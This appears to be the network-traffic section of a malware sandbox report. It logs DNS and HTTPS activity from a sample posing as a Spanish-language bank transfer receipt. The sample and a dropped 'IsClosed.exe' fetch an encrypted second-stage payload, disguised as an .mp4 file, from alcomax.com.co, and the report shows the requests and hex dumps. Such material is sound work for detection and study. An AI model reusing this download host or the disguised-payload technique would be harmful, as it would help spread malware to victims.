                                      Feb 19, 2025 08:57:11.272114038 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.272254944 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.272389889 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.272490978 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.272816896 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.272885084 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.272888899 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.272900105 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.273205996 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.273427963 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.273489952 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.273616076 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.273669004 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.273685932 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.273699999 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.273741007 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.273741007 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.273756981 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.273878098 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.274665117 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.274715900 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.274732113 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.274738073 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.274779081 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.274779081 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.275182962 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.275332928 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.297159910 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.297673941 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.321521997 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.321607113 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.321702957 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.321702957 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.321736097 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.321824074 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.321885109 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.321894884 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.322001934 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.360246897 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.360348940 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.360415936 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.360491991 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.360678911 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.360879898 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.361104965 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.361182928 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.361341000 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.361408949 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.361418009 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.361430883 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.361557007 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.362118006 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.362176895 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.362191916 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.362205029 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.362246037 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.362246037 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.362677097 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.362771988 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.362884045 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.362936974 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.363086939 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.363142014 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.363169909 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.363177061 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.363217115 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.363326073 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.385900021 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.385998964 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.410301924 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.410404921 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.410459042 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.410531998 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.410715103 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.410787106 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.448978901 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.449182987 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.449201107 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.449218988 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.449255943 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.449255943 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.449388027 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.449553013 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.449690104 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450026035 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450093031 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450158119 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450166941 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450172901 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450220108 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450220108 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450371027 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450537920 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450615883 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450690985 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450933933 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451176882 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451185942 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451200962 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451241970 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451242924 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451241970 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451261044 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451333046 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451894999 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451939106 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451982975 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451982975 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451997042 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.452653885 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.455919027 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.456104040 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.475183010 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.475296021 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499270916 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499429941 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499562025 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499690056 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499722958 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499811888 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499835968 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499986887 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.502528906 CET49705443192.168.2.5204.44.192.90

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 19, 2025 08:56:55.735028028 CET5537053192.168.2.51.1.1.1
                                      Feb 19, 2025 08:56:55.977088928 CET53553701.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Feb 19, 2025 08:56:55.735028028 CET192.168.2.51.1.1.10xbc37Standard query (0)alcomax.com.coA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Feb 19, 2025 08:56:55.977088928 CET1.1.1.1192.168.2.50xbc37No error (0)alcomax.com.co204.44.192.90A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • alcomax.com.co

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704204.44.192.904434956C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      TimestampBytes transferredDirectionData
                                      2025-02-19 07:56:56 UTC78OUTGET /Ilmseyropc.mp4 HTTP/1.1
                                      Host: alcomax.com.co
                                      Connection: Keep-Alive
                                      2025-02-19 07:56:56 UTC269INHTTP/1.1 200 OK
                                      Date: Wed, 19 Feb 2025 07:56:56 GMT
                                      Server: Apache
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Last-Modified: Tue, 18 Feb 2025 18:42:11 GMT
                                      Accept-Ranges: bytes
                                      Content-Length: 1249800
                                      Vary: Accept-Encoding,User-Agent
                                      Content-Type: video/mp4
                                      2025-02-19 07:56:56 UTC7923INData Raw: bc 96 ae db 7f b8 d7 55 35 37 69 0a 4e 0e 06 24 26 95 b8 5b 9c 23 81 86 59 1e 53 14 1c 74 2a b5 f3 51 c3 70 02 98 b0 3c 33 5d ac 2e 0e 06 3b 5b b2 b7 ce 61 ff 50 f6 5b 52 a4 58 d3 9c 16 fc 21 7e 8d 04 c3 29 6c 9e 24 7e e1 6c 0c 61 9b 3d bf ac 48 ed 6e f4 20 11 fd 4c e2 6f 18 8c 5f e2 b1 1f ee 68 cc 18 80 dc c8 92 68 44 77 58 af 3f 91 6f 8f 0d 93 38 10 f0 77 be ca 3d 39 a6 89 ef ea c4 43 eb 68 68 39 99 cb 84 48 31 f8 21 3d fe 0f f6 d5 da 11 f4 75 3c 67 61 43 8c 10 62 dc 0c 5d 9d e0 34 a4 62 a0 7d e0 4c 63 8e e6 aa ac 35 8f 76 4f 82 8a 16 1f 60 f2 d1 0a a6 54 eb 42 78 73 6e 2c d0 03 ca 5c 15 3a 29 a0 78 02 86 68 eb 72 9e ef ed 1e 53 2d c8 7c 33 27 26 b8 49 83 1f c4 a7 5a 27 42 a9 28 bf 6a a9 c5 25 a2 fe 26 c3 30 85 28 05 01 9a 38 59 8c 13 91 8b 06 85 6c 62
                                      Data Ascii: U57iN$&[#YSt*Qp<3].;[aP[RX!~)l$~la=Hn Lo_hhDwX?o8w=9Chh9H1!=u<gaCb]4b}Lc5vO`TBxsn,\:)xhrS-|3'&IZ'B(j%&0(8Ylb
                                      2025-02-19 07:56:56 UTC8000INData Raw: 95 5d c4 da a2 ca 3c b1 99 8f c6 0f 06 e0 54 4a 7c 8d 98 d4 92 d5 af 5f ad d4 82 24 18 0a ed 0c f2 ff 4c 33 d5 39 b5 0c b2 b5 93 5d 4b 48 01 1b a2 11 c7 29 1f 9f 48 2a 80 2d f3 f7 2e d2 e1 74 c9 9b 62 54 cf 5b e0 73 34 af 54 9b 12 0a 07 32 86 e0 0a ac dc 81 04 19 54 64 9c 63 26 9a 37 46 b1 c2 98 74 27 eb ae 00 8c a2 bf a7 19 da 74 72 2f 7e 73 fc 0d 15 f5 28 7f 2a 88 ec 14 8a 4f ab ba 57 2b c2 6b 4a b3 e4 5c 89 a2 d1 df 6f 5e 75 b0 8b 70 9a 83 c6 d9 3b 70 3a 97 1c 9c 71 af d0 2d b5 a8 6a c1 81 e3 27 42 1f 24 c0 a3 a7 12 74 00 8b dd 52 36 1b 44 ed 3b 61 44 11 6e 62 d6 07 49 74 1f 4f b7 e8 85 62 f8 19 f6 09 15 66 dd 4b f4 bf 61 94 98 a6 6f 78 1b d8 df 89 4c 5f 19 0c 38 6b 49 7b 8f 41 6c bc 5c 37 05 0b 85 35 7d a5 73 c4 99 58 a2 e3 61 d2 2e 47 d6 db 25 bf 8f
                                      Data Ascii: ]<TJ|_$L39]KH)H*-.tbT[s4T2Tdc&7Ft'tr/~s(*OW+kJ\o^up;p:q-j'B$tR6D;aDnbItObfKaoxL_8kI{Al\75}sXa.G%
                                      2025-02-19 07:56:56 UTC8000INData Raw: c8 16 81 e5 8a a9 b8 6c aa 01 5d a0 90 0f b4 0f 99 a6 10 8d 6e 3c b9 2a a3 67 da be f2 0b f0 a8 35 4e bc 5d 64 d5 3c 1d a8 1d 0e b5 cc cf 4b 99 78 0d 0b 99 bd 3a 40 cf 74 9c 33 be 31 69 ae 77 0b a2 43 97 d3 ef 64 3a 6e c7 ff 3f 04 18 ea d9 17 65 46 bb cb ed f1 5a 15 a7 75 91 6e 52 32 33 6e d2 21 f1 59 6d 18 62 5d 15 c8 1c a5 47 74 65 e8 b5 b4 90 f8 e6 43 58 e5 3a 50 df 55 f9 f4 11 74 55 a7 dc 48 d3 7e 90 d5 6c 9a 66 46 00 76 c0 62 4f 9f b5 47 e8 a4 97 d2 47 81 70 4d 1d e5 46 70 82 fd f4 61 fb 87 e7 c3 0c a8 0e 5b c7 e2 5e e4 e3 36 44 0d 9d 1a 20 66 5c 96 38 1a 31 68 f2 d8 bb f1 e1 d6 0b a5 76 6a 18 14 85 6c 06 9f 39 2a 34 c4 2f df 0e 9a d1 95 3b bc fd 01 a8 7d 1c 4b 70 ef a7 63 99 bb 3c a8 69 ce 97 a8 33 ac 3f 64 2b 51 7e b7 7e 95 8d 58 03 a2 bf e1 7b 55
                                      Data Ascii: l]n<*g5N]d<Kx:@t31iwCd:n?eFZunR23n!Ymb]GteCX:PUtUH~lfFvbOGGpMFpa[^6D f\81hvjl9*4/;}Kpc<i3?d+Q~~X{U
                                      2025-02-19 07:56:56 UTC8000INData Raw: 70 31 11 96 3c a4 ee 64 ed 43 86 09 da 5e 2a c2 73 0e 0d 35 17 93 3e ea 40 ed 36 84 76 aa 25 06 15 51 8a 2b d2 65 8c 7b 16 fb 3a 42 02 5b b7 16 76 4e c1 ac c2 f8 98 fc 4e d8 d5 a3 03 44 c2 9a 1f 83 40 5c 68 ce e5 60 d7 8d 4c d2 d1 12 98 c6 fc 7c b0 29 c2 d9 18 59 23 6c 89 94 57 57 cc b6 ab 30 7a de 8a 62 f6 71 8b 89 8f fc b9 70 87 0d a4 6c e5 05 ac 58 18 74 43 e2 30 16 34 1e 19 3e 98 23 c6 ae ed 14 fa b9 3a 65 2f 2b b4 d3 77 69 0b 8b 73 ac 26 0f b1 95 f1 f7 eb 7f a4 42 be d8 b6 26 53 09 e4 a4 64 06 46 cd 48 7a 53 fc 24 75 bf 76 c9 c0 06 de 34 5f ba 5f b5 57 9a 13 fe 28 17 aa 8d e4 57 fa 16 32 26 d0 f6 4d 4a d5 2a 39 34 98 d7 6e 9e 53 92 1d 51 b3 0c 51 24 5c e3 30 58 12 c5 a6 60 e8 29 88 cc ae d1 24 e8 fb 82 28 04 58 d4 c5 6b 4f 0d a4 e5 62 4c 6d 36 ea 45
                                      Data Ascii: p1<dC^*s5>@6v%Q+e{:B[vNND@\h`L|)Y#lWW0zbqplXtC04>#:e/+wis&B&SdFHzS$uv4__W(W2&MJ*94nSQQ$\0X`)$(XkObLm6E
                                      2025-02-19 07:56:56 UTC8000INData Raw: 36 f0 c2 45 4e 02 00 36 7c f1 ce f2 85 1a e2 7b f3 bb 75 38 5e d8 f1 ae 8d 8f 8f a7 8e 50 7c 08 b4 f2 84 f5 27 2c 36 68 3e a1 28 cd 6b 32 6e 68 74 a0 4d 72 03 ca 10 65 1f 43 6a 23 89 51 b8 f3 7d b9 b8 32 2f 56 dd 36 45 20 9d 5a 90 79 90 77 54 01 bb 48 89 88 7f 43 a0 fa 59 91 8d 6f fe 78 27 18 16 d2 47 0d f5 73 7b 31 48 eb 30 77 50 fe 90 ab f1 9d b8 58 0d 00 74 fd 04 31 a3 8e 63 02 92 af bc 62 5a 86 f8 12 4d 9c 41 2d 46 58 fb 39 55 0b ff 5a f8 ed fe c2 fd c2 0d 7f 1d 89 08 72 ce 8a 84 c4 8a ae 17 4c 7b 1e 7a af f4 00 e9 e2 8f 93 43 34 11 1e b8 3d 1e c8 31 e9 e3 93 f4 2f 64 31 11 8d 20 5f c6 e3 b9 03 0a cc f0 0e a9 b8 5b 30 75 ec 65 74 e0 de c1 e2 6c 04 5d 07 79 0a b7 18 6a 4f 18 f1 16 31 99 6d 10 11 09 b1 6b a1 82 ef 24 46 b9 4d 77 ca d7 c1 58 0a bb 95 72
                                      Data Ascii: 6EN6|{u8^P|',6h>(k2nhtMreCj#Q}2/V6E ZywTHCYox'Gs{1H0wPXt1cbZMA-FX9UZrL{zC4=1/d1 _[0uetl]yjO1mk$FMwXr
                                      2025-02-19 07:56:57 UTC8000INData Raw: 6a 5d fc 6c d7 a7 fd de 6e 4c 38 e7 62 70 2d 87 67 d2 44 e6 9e f7 09 95 3c 60 ed e0 d1 83 13 43 87 77 1d e5 df 74 83 2a e5 b4 93 ec 39 f1 76 51 b3 db 31 a1 76 29 65 ca 22 a9 f2 25 72 f8 78 db 51 9f e6 b9 9f 77 db 60 bd a1 3d 93 4c cd d3 0a 8b d1 75 ca ad 82 d7 ff 95 e4 7e 78 a2 6a 32 8a 39 8f c5 f7 d9 0d 7d c5 d8 82 5e 54 5d bd 32 2a 32 26 cd ef d8 12 47 17 5e 31 d6 85 e8 41 65 74 4c 54 b0 dd 31 d0 45 e0 22 48 94 70 a4 cd e4 e6 8c 30 ae 23 10 64 4c 12 2d 57 7f 80 65 4d 02 73 ea 94 34 95 84 0c de c6 76 37 00 77 14 fb 11 92 55 d4 84 d6 fb df c0 58 96 5c a6 d0 49 10 d6 89 62 43 05 21 a0 ec 94 f1 8c 2f 73 3f 6a f4 16 b8 a5 f0 8d 10 ef de 2a 49 74 d9 3a 68 69 87 cb cf 0d 26 f0 00 ea b9 ee ce ec 7b ee fa d7 c5 b0 bf 80 7e ec 50 5a dd 24 0c e6 c8 9a 28 f9 0e 44
                                      Data Ascii: j]lnL8bp-gD<`Cwt*9vQ1v)e"%rxQw`=Lu~xj29}^T]2*2&G^1AetLT1E"Hp0#dL-WeMs4v7wUX\IbC!/s?j*It:hi&{~PZ$(D
                                      2025-02-19 07:56:57 UTC8000INData Raw: d1 17 5e aa cf 98 56 bf 2c b0 26 80 29 a4 07 af 6c c9 ee c2 d1 e4 63 9d cd d1 4b e5 5e 06 24 c8 50 7b ed a2 d1 96 e0 1b 22 ae c0 ee 68 d8 8f e4 81 75 8d cc 3a ff df 3a 78 cb 9f 46 7b ec 6d 53 da 24 1f 9b e3 74 2c 0b 17 fb 76 2f 85 7b 4d ed 95 ac 9e 8b 30 49 14 1e 29 aa 73 53 4f 6c 53 12 7a da 7c 2b 77 6f eb fd a9 e8 07 60 d8 77 37 f7 8a f2 13 67 20 88 4e 34 a3 7a 71 49 68 ae b3 3f 16 f3 82 59 ce f9 35 fe f6 8c d0 63 0b c9 75 79 08 fe 64 30 d2 56 2c 07 47 82 83 b7 62 ab 1a 98 8e ed da 50 86 69 6f 0c d3 6c 14 3c 85 bd e1 3a 5c 0d 3b 7f a0 1c 2a e6 49 1c 0c ba 35 3f 1c 50 c8 0a 3c fc 21 20 a5 4d c6 07 fe d5 34 98 9a 12 12 ce 0b 7c 40 b9 41 96 46 2c 99 15 f4 12 bf 22 18 cd 7c 51 87 4a d9 5c 7f d3 4d 4b 7f f5 8c 8f 10 bd 05 03 02 6c b8 7e 1b 6c 72 52 a8 ee ab
                                      Data Ascii: ^V,&)lcK^$P{"hu::xF{mS$t,v/{M0I)sSOlSz|+wo`w7g N4zqIh?Y5cuyd0V,GbPiol<:\;*I5?P<! M4|@AF,"|QJ\MKl~lrR
                                      2025-02-19 07:56:57 UTC8000INData Raw: 1f e2 3d 00 2b cf 68 05 89 3a 40 dc e2 ed 43 57 91 44 75 74 b9 75 42 03 70 ea 9e ac 61 c7 2e bd 33 57 0c 56 6f 44 08 25 1a 18 66 43 5f 43 6a 98 b2 dc 51 e4 bd b4 5a e4 1e 0c 3d ea 47 b9 30 50 f7 39 ec a7 c4 d2 fd 16 c2 47 6b b5 f7 aa 32 d0 56 97 c2 78 af 46 31 18 76 2c 05 51 13 6c a5 67 28 9d a4 c8 44 ed f4 16 89 b1 16 9c fe 93 e9 10 66 23 1c 58 74 17 b3 ee 3b a5 55 73 91 66 e0 12 9f 8a da 5a 9c 32 b5 07 e3 e5 1d 59 88 97 e2 ad 1a 2e 40 e6 ab c0 19 86 1a 0b 0b 6e d8 02 36 72 18 42 7c 6c ec 00 09 7c 45 5f 8c a0 b0 56 92 73 74 c0 1f e6 f7 86 b8 d7 4e dc 92 cf a0 2a 02 34 84 2f b9 94 16 fb 64 20 f3 49 59 0a aa b7 22 40 60 1f 39 4c fa 8a 22 a3 af 76 a1 6d 67 da 7b 7f 6f 8d 31 9e a8 53 61 8a 81 0d b4 5e af 8d e1 72 0c da 00 1b b9 6f 61 ae f0 00 71 9c e9 a0 1d
                                      Data Ascii: =+h:@CWDutuBpa.3WVoD%fC_CjQZ=G0P9Gk2VxF1v,Qlg(Df#Xt;UsfZ2Y.@n6rB|l|E_VstN*4/d IY"@`9L"vmg{o1Sa^roaq
                                      2025-02-19 07:56:57 UTC8000INData Raw: 71 16 22 9d c9 dc 7b ef d4 c6 3a 9b 31 4f b5 7c 4f 1a 55 b5 3d 5c 7f 14 53 df ee 7e 5e b3 31 9c 9a f3 e9 24 e8 c4 86 ca 1f 67 47 f6 ef c0 03 22 24 11 77 84 0b 5f 01 a7 f3 8d 37 a8 5a e4 8b c0 60 6c 69 47 4f 68 d8 d6 a7 97 5e 1a 7f 68 1c 97 50 dc 63 38 fb 5c f4 d5 ee 6a 5e 1a 9c 6f cc 76 7f b7 89 dc 4d f6 42 6e 1a 67 03 7c 10 b9 fb 80 11 87 70 e0 7a a8 7f bc 28 f0 c2 c8 8c fe c1 0c f2 48 85 2a a1 ad 72 33 24 16 5c 12 37 94 94 07 c6 54 78 57 e6 4d df 68 96 22 70 9e e6 c4 3d 79 8c 65 55 fc 4d de 47 47 02 45 85 d6 6b bc 69 40 e9 62 16 f6 f6 a2 3f b3 af 00 1f 1d a1 b6 c8 3f c9 68 fe bb 2e c9 4a a4 4d 72 4d 6d c4 0f 59 0b 48 0f fe e2 aa c4 b2 34 3e 16 26 b5 fb c0 58 a1 0c 09 63 99 f3 37 58 5d 85 99 27 a5 9d 85 75 30 07 74 4c 11 b9 6a 3a 82 d9 be 13 29 fb c7 58
                                      Data Ascii: q"{:1O|OU=\S~^1$gG"$w_7Z`liGOh^hPc8\j^ovMBng|pz(H*r3$\7TxWMh"p=yeUMGGEki@b??h.JMrMmYH4>&Xc7X]'u0tLj:)X
                                      2025-02-19 07:56:57 UTC8000INData Raw: f7 fc bc cd dd 7f 67 83 7e 73 0c 06 1a dd 44 8e df f7 2f c1 a2 c1 29 90 8d ed 6d 74 27 a3 c4 ce ee d2 d6 8a 55 d1 28 d7 62 0e 6b f3 62 ef ab 68 8c ab 38 43 d1 4d fd c9 f8 d1 30 54 62 aa 7e bb 5d c7 17 08 97 6f d0 c0 84 03 13 9e 14 76 28 64 4d c3 24 a3 7a 0f 06 15 85 30 33 70 d4 d8 11 7d 69 57 ff ee 06 f1 7f 78 04 bd 0a f8 4e a2 9e 63 ba ca 4e 91 60 03 4c 4f e6 a4 ab 3f 19 d0 1d 32 b6 dc 25 d3 e6 bd 6a 89 2b 4b 78 ca 94 d6 db 34 98 26 d0 1a 80 01 dc 31 ab d4 1e 7b 17 dc 2f d3 3f a8 0c 90 93 59 ae 22 ba 1c a3 91 a3 c8 fb 1a 7c 88 ef 10 b3 98 2a 3e 83 f3 a0 f6 db 2f 58 00 c6 ec 20 9c c5 eb f9 10 c4 15 6f 15 11 4b 48 d0 08 a5 2e 3c 8f ea 00 f8 57 05 78 44 21 8c 75 d3 ea 0e da 1a 99 d2 13 79 9c 88 d1 39 5c 09 b4 4a d8 64 42 2d ff 0a b9 d6 09 83 b3 c3 a8 bf 87
                                      Data Ascii: g~sD/)mt'U(bkbh8CM0Tb~]ov(dM$z03p}iWxNcN`LO?2%j+Kx4&1{/?Y"|*>/X oKH.<WxD!uy9\JdB-


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549705204.44.192.904437120C:\Users\user\AppData\Roaming\IsClosed.exe
                                      TimestampBytes transferredDirectionData
                                      2025-02-19 07:57:10 UTC78OUTGET /Ilmseyropc.mp4 HTTP/1.1
                                      Host: alcomax.com.co
                                      Connection: Keep-Alive
                                      2025-02-19 07:57:10 UTC269INHTTP/1.1 200 OK
                                      Date: Wed, 19 Feb 2025 07:57:09 GMT
                                      Server: Apache
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Last-Modified: Tue, 18 Feb 2025 18:42:11 GMT
                                      Accept-Ranges: bytes
                                      Content-Length: 1249800
                                      Vary: Accept-Encoding,User-Agent
                                      Content-Type: video/mp4
                                      2025-02-19 07:57:10 UTC7923INData Raw: bc 96 ae db 7f b8 d7 55 35 37 69 0a 4e 0e 06 24 26 95 b8 5b 9c 23 81 86 59 1e 53 14 1c 74 2a b5 f3 51 c3 70 02 98 b0 3c 33 5d ac 2e 0e 06 3b 5b b2 b7 ce 61 ff 50 f6 5b 52 a4 58 d3 9c 16 fc 21 7e 8d 04 c3 29 6c 9e 24 7e e1 6c 0c 61 9b 3d bf ac 48 ed 6e f4 20 11 fd 4c e2 6f 18 8c 5f e2 b1 1f ee 68 cc 18 80 dc c8 92 68 44 77 58 af 3f 91 6f 8f 0d 93 38 10 f0 77 be ca 3d 39 a6 89 ef ea c4 43 eb 68 68 39 99 cb 84 48 31 f8 21 3d fe 0f f6 d5 da 11 f4 75 3c 67 61 43 8c 10 62 dc 0c 5d 9d e0 34 a4 62 a0 7d e0 4c 63 8e e6 aa ac 35 8f 76 4f 82 8a 16 1f 60 f2 d1 0a a6 54 eb 42 78 73 6e 2c d0 03 ca 5c 15 3a 29 a0 78 02 86 68 eb 72 9e ef ed 1e 53 2d c8 7c 33 27 26 b8 49 83 1f c4 a7 5a 27 42 a9 28 bf 6a a9 c5 25 a2 fe 26 c3 30 85 28 05 01 9a 38 59 8c 13 91 8b 06 85 6c 62
                                      Data Ascii: U57iN$&[#YSt*Qp<3].;[aP[RX!~)l$~la=Hn Lo_hhDwX?o8w=9Chh9H1!=u<gaCb]4b}Lc5vO`TBxsn,\:)xhrS-|3'&IZ'B(j%&0(8Ylb
